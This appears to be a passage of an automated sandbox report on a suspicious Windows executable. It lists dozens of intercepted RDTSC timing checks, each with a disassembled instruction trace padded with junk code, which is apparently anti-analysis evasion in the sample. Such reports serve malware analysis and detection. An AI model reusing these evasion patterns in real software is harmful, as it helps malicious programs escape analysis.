Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 172B2DE second address: 172B326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9665989DB0h 0x00000009 pop ecx 0x0000000a push edi 0x0000000b jmp 00007F9665989DB1h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 jmp 00007F9665989DB8h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 173CD40 second address: 173CD4A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F96652499F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 173CD4A second address: 173CD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 173CD50 second address: 173CD86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665249A09h 0x00000009 jmp 00007F9665249A09h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 173CD86 second address: 173CD8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 173CD8A second address: 173CDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F96652499FBh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 ja 00007F96652499F6h 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180AB48 second address: 180AB4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180AB4E second address: 180AB53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180AE62 second address: 180AE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180AE68 second address: 180AE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180AFF8 second address: 180B040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9665989DB1h 0x00000008 jne 00007F9665989DA6h 0x0000000e popad 0x0000000f jns 00007F9665989DA8h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jo 00007F9665989DA6h 0x00000020 jne 00007F9665989DA6h 0x00000026 jno 00007F9665989DA6h 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F9665989DABh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180B040 second address: 180B053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FDh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180B053 second address: 180B05C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180B744 second address: 180B763 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F96652499FCh 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180B8EB second address: 180B8F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180B8F1 second address: 180B8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180B8FB second address: 180B8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180D42E second address: 180D436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180D436 second address: 180D43D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 180FF7F second address: 180FF89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F96652499F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 181004C second address: 1810050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1810050 second address: 1810056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1810056 second address: 18100B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F9665989DA8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 add dword ptr [ebp+12B90152h], edi 0x0000002b push 00000004h 0x0000002d push edx 0x0000002e mov edx, dword ptr [ebp+12A01818h] 0x00000034 pop edx 0x00000035 jmp 00007F9665989DB4h 0x0000003a push F926B5A3h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 18100B1 second address: 18100B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 18100B7 second address: 18100BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 18100BC second address: 18100C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 181035F second address: 1810372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F9665989DA8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1810372 second address: 1810378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1810378 second address: 18103AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ebx 0x0000000d jnc 00007F9665989DACh 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push edi 0x00000017 jbe 00007F9665989DACh 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 18138C8 second address: 18138CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74700CA second address: 7470101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov ebx, 6EF9038Ah 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F9665989DB7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470101 second address: 747012E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F96652499FDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747012E second address: 7470134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470134 second address: 7470138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470138 second address: 747018D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b jmp 00007F9665989DAFh 0x00000010 xchg eax, esi 0x00000011 jmp 00007F9665989DB6h 0x00000016 push eax 0x00000017 jmp 00007F9665989DABh 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F9665989DB5h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747018D second address: 74701F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F96652499FDh 0x0000000b xor si, 9536h 0x00000010 jmp 00007F9665249A01h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esi, dword ptr [775606ECh] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov bx, DDBEh 0x00000026 pushfd 0x00000027 jmp 00007F96652499FFh 0x0000002c or al, 0000006Eh 0x0000002f jmp 00007F9665249A09h 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74701F5 second address: 747021B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9665989DADh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747021B second address: 74702E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F966524A7C4h 0x0000000f pushad 0x00000010 mov ecx, 79A0BC63h 0x00000015 mov dl, cl 0x00000017 popad 0x00000018 push esi 0x00000019 jmp 00007F9665249A00h 0x0000001e mov dword ptr [esp], edi 0x00000021 jmp 00007F9665249A00h 0x00000026 call dword ptr [77530B60h] 0x0000002c mov eax, 756AE5E0h 0x00000031 ret 0x00000032 jmp 00007F9665249A00h 0x00000037 push 00000044h 0x00000039 jmp 00007F9665249A00h 0x0000003e pop edi 0x0000003f pushad 0x00000040 pushad 0x00000041 jmp 00007F96652499FCh 0x00000046 popad 0x00000047 mov edi, 48E10214h 0x0000004c popad 0x0000004d push esp 0x0000004e jmp 00007F9665249A08h 0x00000053 mov dword ptr [esp], edi 0x00000056 pushad 0x00000057 jmp 00007F96652499FEh 0x0000005c mov edi, esi 0x0000005e popad 0x0000005f push dword ptr [eax] 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F9665249A03h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747038D second address: 7470391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470391 second address: 7470397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470397 second address: 747039D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747039D second address: 74703A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74703A1 second address: 7470401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b jmp 00007F9665989DB5h 0x00000010 mov dword ptr [esi+08h], eax 0x00000013 jmp 00007F9665989DAEh 0x00000018 mov dword ptr [esi+0Ch], eax 0x0000001b jmp 00007F9665989DB0h 0x00000020 mov eax, dword ptr [ebx+4Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9665989DB7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470401 second address: 747042B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov bx, 379Ch 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747042B second address: 7470481 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c jmp 00007F9665989DB0h 0x00000011 mov dword ptr [esi+14h], eax 0x00000014 pushad 0x00000015 mov dx, ax 0x00000018 movzx esi, di 0x0000001b popad 0x0000001c mov eax, dword ptr [ebx+54h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 call 00007F9665989DAEh 0x00000027 pop eax 0x00000028 call 00007F9665989DABh 0x0000002d pop ecx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470481 second address: 747049A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665249A05h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747049A second address: 7470533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+18h], eax 0x0000000e jmp 00007F9665989DAEh 0x00000013 mov eax, dword ptr [ebx+58h] 0x00000016 pushad 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F9665989DACh 0x0000001e add ch, 00000038h 0x00000021 jmp 00007F9665989DABh 0x00000026 popfd 0x00000027 popad 0x00000028 mov bx, 6E5Ah 0x0000002c popad 0x0000002d mov dword ptr [esi+1Ch], eax 0x00000030 jmp 00007F9665989DB1h 0x00000035 mov eax, dword ptr [ebx+5Ch] 0x00000038 pushad 0x00000039 call 00007F9665989DACh 0x0000003e movzx esi, dx 0x00000041 pop edx 0x00000042 mov dl, ah 0x00000044 popad 0x00000045 mov dword ptr [esi+20h], eax 0x00000048 pushad 0x00000049 mov eax, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F9665989DB7h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470533 second address: 7470573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [ebx+60h] 0x0000000d pushad 0x0000000e mov dx, ax 0x00000011 popad 0x00000012 mov dword ptr [esi+24h], eax 0x00000015 jmp 00007F96652499FFh 0x0000001a mov eax, dword ptr [ebx+64h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470573 second address: 7470577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470577 second address: 7470592 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470592 second address: 7470598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470598 second address: 74705DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+28h], eax 0x0000000e jmp 00007F9665249A06h 0x00000013 mov eax, dword ptr [ebx+68h] 0x00000016 pushad 0x00000017 mov dx, si 0x0000001a mov edx, esi 0x0000001c popad 0x0000001d mov dword ptr [esi+2Ch], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F96652499FBh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74705DC second address: 7470601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov edx, 4D83C7C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ax, word ptr [ebx+6Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9665989DAFh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470601 second address: 7470607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470607 second address: 747060D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747060D second address: 7470611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470611 second address: 747066D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+30h], ax 0x0000000f jmp 00007F9665989DB0h 0x00000014 mov ax, word ptr [ebx+00000088h] 0x0000001b jmp 00007F9665989DB0h 0x00000020 mov word ptr [esi+32h], ax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F9665989DB7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747066D second address: 7470673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470673 second address: 74706C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+0000008Ch] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F9665989DB4h 0x00000018 add cl, FFFFFFB8h 0x0000001b jmp 00007F9665989DABh 0x00000020 popfd 0x00000021 mov ch, 9Ah 0x00000023 popad 0x00000024 mov dword ptr [esi+34h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov ax, 3C83h 0x0000002e mov bx, cx 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74706C0 second address: 74706FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F96652499FBh 0x00000009 jmp 00007F9665249A03h 0x0000000e popfd 0x0000000f mov bl, ah 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov eax, dword ptr [ebx+18h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F96652499FEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74706FB second address: 747072C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c jmp 00007F9665989DB6h 0x00000011 mov eax, dword ptr [ebx+1Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747072C second address: 7470730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470730 second address: 747074D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747074D second address: 747076B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747076B second address: 74707C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9665989DB1h 0x00000009 xor ax, 8C36h 0x0000000e jmp 00007F9665989DB1h 0x00000013 popfd 0x00000014 mov edi, esi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebx+20h] 0x0000001c pushad 0x0000001d mov edi, 20201ECAh 0x00000022 popad 0x00000023 mov dword ptr [esi+40h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F9665989DAAh 0x0000002f xor si, 2A88h 0x00000034 jmp 00007F9665989DABh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74707C9 second address: 7470801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f jmp 00007F9665249A00h 0x00000014 push 00000001h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470801 second address: 7470842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9665989DB4h 0x00000009 adc al, 00000078h 0x0000000c jmp 00007F9665989DABh 0x00000011 popfd 0x00000012 mov bx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9665989DB1h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470842 second address: 7470852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96652499FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470852 second address: 7470875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cl, dl 0x0000000e jmp 00007F9665989DB4h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470875 second address: 7470887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96652499FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470887 second address: 74708C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F9665989DB6h 0x00000011 lea eax, dword ptr [ebp-10h] 0x00000014 jmp 00007F9665989DB0h 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74708C9 second address: 74708CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74708CF second address: 74708D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
